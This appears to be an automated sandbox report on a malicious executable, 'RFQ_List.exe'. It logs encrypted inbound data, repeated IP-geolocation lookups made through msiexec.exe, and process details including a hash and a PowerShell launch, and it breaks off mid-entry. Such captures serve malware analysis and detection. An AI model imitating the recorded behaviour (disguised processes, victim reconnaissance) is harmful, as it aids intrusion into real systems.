HTTPa@n==0X,'S\|z$8QMi;LhqpJ\n&_Y2pEvMK6J,:w.C+)\u20`tTU]N[?g3k6T-#Tspeu
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: 61 65 6f 2c fe 9a 92 c9 c3 59 1a 1d 23 18 1f 03 45 5f 12 97 cc 1c 19 71 4d 02 8c 36 45 d2 2f 62 bc 86 2c 01 1e 92 3a da 24 1b 2f 20 34 6e 2a 29 f9 e6 6c 32 b7 c7 42 af 8a a7 9d 81 5d 02 a8 08 f3 b0 43 b1 89 97 bb 56 ae 4b 4b be 5b 2f 73 cd ca 1f ba e6 2d 66 4b 16 c1 0e a0 53 b6 c1 90 c1 aa aa 51 bc b9 e3 0c 3c de da b7 c5 22 ca 17 b0 80 a4 7a b2 24 6f b8 7f cf b8 32 9d 75 58 6b d0 d2 19 a9 81 cd 20 b5 92 a4 cd 43 7c fb 85 6f 07 64 21 a9 2f b1 b2 60 70 c2 6b cf 93 a9 91 29 8f c8 c0 23 86 20 6f 4b 3f ca b5 74 e7 8f 73 98 89 47 e1 62 e4 1f ad 59 83 76 0d 38 f8 38 90 93 e2 0a 08 42 f3 65 c1 eb e6 bc bb 8c 3d c5 e5 41 c4 1e 42 c3 4c fb e8 54 fb 46 7e 24 a9 91 b4 b9 09 6f c5 34 e1 8e 3b 67 b2 2a 09 c6 05 69 73 f8 63 ca 24 9a 52 24 68 fa e4 fd 63 e6 21 09 97 11 Data Ascii: aeo,Y#E_qM6E/b,:$/ 4n)l2B]CVKK[/s-fKSQ<"z$o2uXk C\|od!/`pk)# oK?tsGbYv88Be=ABLTF~$o4;gisc$R$hc!
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: 4f 71 81 94 c3 43 3a f7 f7 e2 31 64 51 90 9e ac 3f 2a 02 61 7d ea f5 f3 bd 35 8f b2 0d c3 91 08 d4 4b 2e cc 65 18 e3 fd 46 a6 38 37 43 4d 8f ca 90 59 f3 5a ca 1d e2 40 71 57 e2 7a a0 67 c0 71 ca eb e0 ab 14 81 4a b7 b0 5b d7 60 f1 e6 44 35 e8 5e fa 7d c3 35 a7 e8 7d d6 71 65 d6 2e fc 8a 5e 83 b2 2c 29 d7 19 2b 82 e4 34 ba 5a 94 73 24 6c c3 ad e0 ee ac 53 1a 8e 34 6d b7 62 6c e4 6f cd 0f d3 c0 ec 22 5c 5c 85 76 29 04 9e 16 9f 08 b8 a2 d3 a9 db 68 bf 77 d0 28 c4 56 49 62 ec 0e 94 6f 7e a6 9d 85 81 ff 35 bf 41 de a6 54 da aa 21 cb 60 51 22 bb ed ec 1f e6 72 e5 c9 d6 fa 50 b8 82 34 ec 42 17 c2 5a 06 63 33 97 86 79 7b 2e 0f 2f 51 aa 8b 49 5a 0e b5 ff e8 df b0 2e 5d b5 f5 46 b0 24 0e 7d 3a 4f ff d6 69 0f 36 64 5a da d7 4f 5f 11 95 91 56 45 00 f3 72 6d 92 5f 39 Data Ascii: OqC:1dQ?*a}5K.eF87CMYZ@qWzgqJ[`D5^}5}qe.^,)+4Zs$lS4mblo"\\v)hw(VIbo~5AT!`Q"rP4BZc3y{./QIZ.]F$}:Oi6dZO_VErm_9
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: 23 79 40 55 1a 2d 76 ab a2 ba 6f 32 36 ca d7 f4 ca 9a 6b 00 48 c8 24 b7 c2 c9 67 48 6f 65 d8 92 27 a4 e1 e5 14 5f ac 83 ea ff c1 fd e8 1b 51 26 13 c3 d8 86 b3 6e ef be 1b aa 2b b8 88 32 f7 5e 2a ea 20 2c 63 22 a7 af 79 fb 2b 0f 07 0b aa 8b 52 5a 6c 21 bf e8 db c3 f0 5d c7 8f 43 98 02 26 21 30 59 07 75 46 1e 71 5a 5b da d3 f9 aa 60 e7 b8 4f 6d 5d db 29 67 e0 52 8c ef 1c d7 7f 50 25 72 83 6d 35 6b 81 f6 48 ef d8 f3 5a 7f d8 45 8f 16 10 6a 44 87 29 c3 79 06 a0 1b fd 98 cc 27 14 5e 55 7d a3 a5 44 b5 c8 06 c7 11 85 9b f1 4e 6e 8b 80 9b 49 93 49 a1 8f 4c 29 b0 36 d7 25 99 74 36 d6 09 6c a9 f0 01 d7 e5 79 44 a9 30 2f 01 ab 2e bb 10 ca 91 8c 4d 21 a8 9d 81 7e 2b aa e0 87 f4 a6 8f 49 bf 4f 09 ca e1 0d 00 23 f6 33 29 bc cc eb 0b 56 f5 fe 2f 28 43 11 e5 e5 c0 d1 e9 Data Ascii: #y@U-vo26kH$gHoe'_Q&n+2^* ,c"y+RZl!]C&!0YuFqZ[`Om])gRP%rm5kHZEjD)y'^U}DNnIIL)6%t6lyD0/.M!~+IO#3)V/(C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	51954	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:21 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:21 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:21 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17072 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DtTyfe%2FG261PUZBHst3OP7xdUoP8OSeCyNVaGCR6eYRmNgKvzJmaW4GkBKNt71jhD%2BH14q4zjedbNP79FbheTETzRLjozWgWsIo7P9OhgYV4Pg6STzBq5iXdpELZrDCuv%2BILt49"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1752f27ddab-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2594982&cwnd=37&unsent_bytes=0&cid=9ff3437fc8725f7e&ts=173&x=0"
2024-10-28 05:47:21 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	51960	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:22 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 05:47:23 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:23 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17074 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuwkIKIyVa2pIlO5arC1h%2BY%2F8A9iPHzHFVaWA7A9MvYi71ocB62HkdiULYYkhAeeyhKmo6SwVmGYnXIUKoCW1bu75SKhGJ3zjV7qMqsH1foxO8JrNq5bc6FdM86POwFVVhq8O5pw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1818a416b13-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1206&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2413333&cwnd=251&unsent_bytes=0&cid=f2fb48f113cc428b&ts=1188&x=0"
2024-10-28 05:47:23 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	51967	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:25 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:25 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:25 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17076 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2juTSstbEdKKVRoAzGwmpMnYlBzydN2CqJrYPktCnCxLmCURjV6wfyYxexKW5ZyOCbuSLNYLAtL8MjGxaOSLvQ7ryT7a3kHUIaAU5ncWczPbEKc6LfdYTqcLBgNg9wddjmX5eMwJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a18a7fb56b61-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1254&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2264268&cwnd=251&unsent_bytes=0&cid=c25d54016c9d4954&ts=151&x=0"
2024-10-28 05:47:25 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	51979	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:26 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:26 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:26 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17077 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvRJ8cv%2B%2FkxqjyMt9%2B53A07DRG26TKr5QhZkC14sE0ILkegdu4CyTtaJ1k2eh4IGNwiQOfv%2FeiJ30Fn91MSJhzYzolUa60C2qQM9MQ7sZORzjtP9KLdx%2FGFmCAv441REpSwEXic4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1933d27eaa4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2232845&cwnd=249&unsent_bytes=0&cid=5f0839998d40c5da&ts=150&x=0"
2024-10-28 05:47:26 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	51995	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:28 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:28 UTC	888	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:28 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17079 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FYadPvxJ9fFJPXHToLZGLAczKkvKigjitJzyb9eozXkNiEqeZkNttWD5FhQJZ9DsTfbacNMTR%2B%2BA5%2BTBBsm45lX7z4cLVWGqtiWQt1oFoarlSU6Hn1aMp%2F2%2BIyC9rACvT6CsBeE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1a16cb70c23-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2193939&cwnd=251&unsent_bytes=0&cid=aceaaa51602aaa6b&ts=153&x=0"
2024-10-28 05:47:28 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	52004	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:30 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:30 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:30 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17081 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPAESNeUYSuDz%2BAbZ6Db9l3ZLweltOBa4CSu0eZnU05neXoLnRZ%2Ft1KfSWSloTtQNxsL1krs0KT1PAjogaoF6SyUx2ic4HuhGt95M12RRRMwzUw%2BKlnQWbSELLrTp5b9ebDr0Uzs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1acffa42c86-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2676524&cwnd=251&unsent_bytes=0&cid=839bc40a0050daf7&ts=152&x=0"
2024-10-28 05:47:30 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52015	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:32 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 05:47:32 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:32 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17083 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AWQfiuOO51lwW%2B06%2B5f2neAQXIgp2To2BZfgxG%2F%2FSQvBltNbdE0eyx5wpDrVIF7lNGzzOYdCeOrG8IMxJd%2B%2FU%2BO7Pk3qYnfEtqwYPBj15Rp8LFIc%2BRac%2BrmCCH7J%2BeFI2Dhs9gp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1b5f9856c7f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2445945&cwnd=249&unsent_bytes=0&cid=f8c6f86ec78f4380&ts=157&x=0"
2024-10-28 05:47:32 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	52026	188.114.97.3	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:33 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 05:47:33 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:33 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17084 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JehFWBikCcE2hQVVVLHaLFCJpRkcLN%2BXU8B43FfLkdg6Q%2B4wFX7%2Bq5KaLmz2EBHXbQBxohRqLC%2Bk6tpC1%2Bmk3orpW8SRuJC8b601Z56jZ9KmbsbczxWSqvTyjlE09q4jdq848Ut"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d98a1bebd3d7d5a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2571936&cwnd=243&unsent_bytes=0&cid=71715aa27d452e89&ts=150&x=0"
2024-10-28 05:47:33 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	01:45:54
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\RFQ_List.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ_List.exe"
Imagebase:	0x400000
File size:	927'736 bytes
MD5 hash:	27393AC93E0C60C934AFA5CCDFC7C529
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:46:00
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
